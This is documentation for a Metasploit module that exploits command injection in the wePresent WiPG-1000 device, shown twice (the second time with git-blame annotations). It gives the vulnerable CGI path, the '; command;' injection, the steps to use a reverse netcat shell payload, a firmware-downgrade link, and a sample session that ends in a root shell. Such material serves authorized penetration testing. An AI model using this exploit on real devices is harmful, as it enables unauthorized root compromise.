documentation/modules/exploit/linux/http/wipg1000_cmd_injection.md

## Vulnerable Application

  This module exploits a command injection vulnerability in the [wePresent WiPG-1000](http://wepresentwifi.com/wipg1000.html) device. A description of the exploited vulnerability is available in section 3.4 of [this advisory](https://www.redguard.ch/advisories/wepresent-wipg1000.txt).
  The latest vulnerable firmware version is 2.0.0.7. Newer versions can be downgraded to [the older firmware](http://www.wepresentwifi.com/assets/downloads/wipg1000/wePresent.1000.2.0.0.7.nad.zip).

  There is no complete list of vulnerable firmware versions, however the check method can reliably detect whether a device is vulnerable. The check method checks for the presence of the `rdfs.cgi` file and whether it contains the string `https://www.redguard.ch/advisories/wepresent-wipg1000.txt`. All known versions of this file on the device are vulnerable to this command injection.

  Manual exploitation would equate to browsing to the URI `http://<ip>/cgi-bin/rdfs.cgi` and entering the String `; command;` in the input field and submitting the form.

  Version 2.0.0.7 was confirmed vulnerable, and firmware 2.2.3.0 was released to fix the exploit.

## Verification Steps

  1. Make sure the device is running.
  2. Start msfconsole.
  3. Do: ```use exploit/linux/http/wipg1000_cmd_injection```
  4. Do: ```set payload cmd/unix/reverse_netcat```
  5. Do: ```set RHOST <ip>```
  6. Do: ```set LHOST <ip>```
  7. Do: ```exploit```
  8. You should get a shell.

## Options

  **PAYLOAD**

  The `generic`,`netcat` and `openssl` payload types are valid.

## Scenarios

### Firmware 2.0.0.7

  The following is an example run getting a shell:

  ```
  msf > use exploit/linux/http/wipg1000_cmd_injection 
  msf exploit(wipg1000_cmd_injection) > set payload cmd/unix/reverse_netcat
  payload => cmd/unix/reverse_netcat
  msf exploit(wipg1000_cmd_injection) > set RHOST 192.168.3.3
  RHOST => 192.168.3.3
  msf exploit(wipg1000_cmd_injection) > set LHOST 192.168.3.216
  LHOST => 192.168.3.216
  msf exploit(wipg1000_cmd_injection) > check
  [*] 192.168.3.3:80 The target appears to be vulnerable.
  msf exploit(wipg1000_cmd_injection) > exploit

  [*] Started reverse TCP handler on 192.168.3.216:4444 
  [*] Sending request
  [*] Command shell session 1 opened (192.168.3.216:4444 -> 192.168.3.3:50893) at 2017-04-20 16:11:48 +0200
  id

  uid=0(root) gid=0(root) groups=0(root),10(wheel)
  ```
Add documentation for WiPG-1000 module 2017-04-21 15:37:47 +02:00			`## Vulnerable Application`

			`This module exploits a command injection vulnerability in the [wePresent WiPG-1000](http://wepresentwifi.com/wipg1000.html) device. A description of the exploited vulnerability is available in section 3.4 of [this advisory](https://www.redguard.ch/advisories/wepresent-wipg1000.txt).`
			`The latest vulnerable firmware version is 2.0.0.7. Newer versions can be downgraded to [the older firmware](http://www.wepresentwifi.com/assets/downloads/wipg1000/wePresent.1000.2.0.0.7.nad.zip).`

			There is no complete list of vulnerable firmware versions, however the check method can reliably detect whether a device is vulnerable. The check method checks for the presence of the `rdfs.cgi` file and whether it contains the string `https://www.redguard.ch/advisories/wepresent-wipg1000.txt`. All known versions of this file on the device are vulnerable to this command injection.

			Manual exploitation would equate to browsing to the URI `http://<ip>/cgi-bin/rdfs.cgi` and entering the String `; command;` in the input field and submitting the form.

added version numbers 2017-04-22 09:45:55 -04:00			`Version 2.0.0.7 was confirmed vulnerable, and firmware 2.2.3.0 was released to fix the exploit.`

Add documentation for WiPG-1000 module 2017-04-21 15:37:47 +02:00			`## Verification Steps`

			`1. Make sure the device is running.`
			`2. Start msfconsole.`
			3. Do: ```use exploit/linux/http/wipg1000_cmd_injection```
			4. Do: ```set payload cmd/unix/reverse_netcat```
			5. Do: ```set RHOST <ip>```
			6. Do: ```set LHOST <ip>```
			7. Do: ```exploit```
			`8. You should get a shell.`

			`## Options`

			`PAYLOAD`

			The `generic`,`netcat` and `openssl` payload types are valid.

			`## Scenarios`

added version numbers 2017-04-22 09:45:55 -04:00			`### Firmware 2.0.0.7`

Add documentation for WiPG-1000 module 2017-04-21 15:37:47 +02:00			`The following is an example run getting a shell:`

			```
			`msf > use exploit/linux/http/wipg1000_cmd_injection`
			`msf exploit(wipg1000_cmd_injection) > set payload cmd/unix/reverse_netcat`
			`payload => cmd/unix/reverse_netcat`
			`msf exploit(wipg1000_cmd_injection) > set RHOST 192.168.3.3`
			`RHOST => 192.168.3.3`
			`msf exploit(wipg1000_cmd_injection) > set LHOST 192.168.3.216`
			`LHOST => 192.168.3.216`
			`msf exploit(wipg1000_cmd_injection) > check`
			`[*] 192.168.3.3:80 The target appears to be vulnerable.`
			`msf exploit(wipg1000_cmd_injection) > exploit`

			`[*] Started reverse TCP handler on 192.168.3.216:4444`
			`[*] Sending request`
			`[*] Command shell session 1 opened (192.168.3.216:4444 -> 192.168.3.3:50893) at 2017-04-20 16:11:48 +0200`
			`id`

			`uid=0(root) gid=0(root) groups=0(root),10(wheel)`
			```